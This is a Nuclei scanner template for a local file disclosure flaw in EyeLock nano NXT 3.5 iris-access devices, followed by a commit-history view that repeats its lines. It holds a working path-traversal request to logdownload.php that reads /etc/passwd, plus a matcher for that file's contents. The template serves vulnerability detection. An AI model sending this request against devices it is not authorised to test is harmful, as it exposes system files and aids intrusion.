nuclei-templates/vulnerabilities/other/eyelock-nano-lfd.yaml

id: eyelock-nano-lfd

info:
  name: EyeLock nano NXT 3.5 - Local File Disclosure
  author: geeknik
  severity: high
  description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
  reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
  tags: iot,lfi,eyelock

requests:
  - method: GET
    path:
      - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
Create eyelock-nano-lfd.yaml 2021-08-16 10:42:45 +00:00			`id: eyelock-nano-lfd`

			`info:`
			`name: EyeLock nano NXT 3.5 - Local File Disclosure`
			`author: geeknik`
			`severity: high`
Updates across many templates for clarity, spelling, and grammar. 2021-09-05 21:13:45 +00:00			`description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.`
Update eyelock-nano-lfd.yaml 2021-08-16 11:10:42 +00:00			`reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt`
			`tags: iot,lfi,eyelock`
Create eyelock-nano-lfd.yaml 2021-08-16 10:42:45 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0:"`
			`part: body`